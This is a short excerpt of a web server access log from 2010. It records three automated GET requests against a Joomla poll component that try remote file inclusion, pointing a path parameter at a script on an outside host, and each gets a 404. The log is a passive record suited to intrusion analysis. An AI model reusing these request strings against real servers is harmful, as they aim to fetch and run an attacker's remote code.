219.240.39.222 - - [24/Feb/2010:05:59:48 -0800] "GET /administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:05:59:48 -0800] "GET /logs/access_100123.log//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
219.240.39.222 - - [24/Feb/2010:05:59:49 -0800] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://200.199.242.22/images/.ajim/ajim1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
